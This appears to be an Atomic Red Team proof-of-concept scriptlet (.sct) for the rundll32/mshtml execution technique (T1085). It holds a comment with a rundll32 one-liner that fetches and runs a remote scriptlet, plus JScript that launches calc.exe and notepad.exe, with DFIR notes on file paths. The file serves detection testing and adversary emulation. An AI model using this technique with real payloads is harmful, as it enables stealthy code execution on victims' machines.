<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}">

	<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();"
	<!-- DFIR -->
	<!-- .sct files are downloaded and executed from a path like this -->
	<!-- Though, the name and extension are arbitary.. -->
	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
	
	<!-- Proof Of Concept - Casey Smith @subTee -->
        <!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct -->
	<script language="JScript">
		<![CDATA[
			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
		]]>
	</script>
</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
	function Exec()
	{
		var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
	}
]]>
</script>

</scriptlet>
